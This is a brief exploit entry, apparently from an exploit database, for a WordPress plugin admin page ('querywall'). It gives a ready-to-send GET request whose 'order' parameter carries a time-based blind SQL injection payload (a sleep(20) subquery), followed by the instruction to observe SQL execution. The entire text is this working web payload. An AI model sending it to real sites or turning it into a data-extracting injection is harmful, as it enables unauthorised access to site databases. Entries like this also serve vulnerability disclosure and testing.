## https://sploitus.com/exploit?id=WPEX-ID:FA7C54C2-5653-4D3D-8163-F3D63272C050 1. Send `GET /wp-admin/admin.php?page=querywall&orderby=date_time_gmt&order=desc%2c(select*from(select(sleep(20)))a)` 2. See SQL execution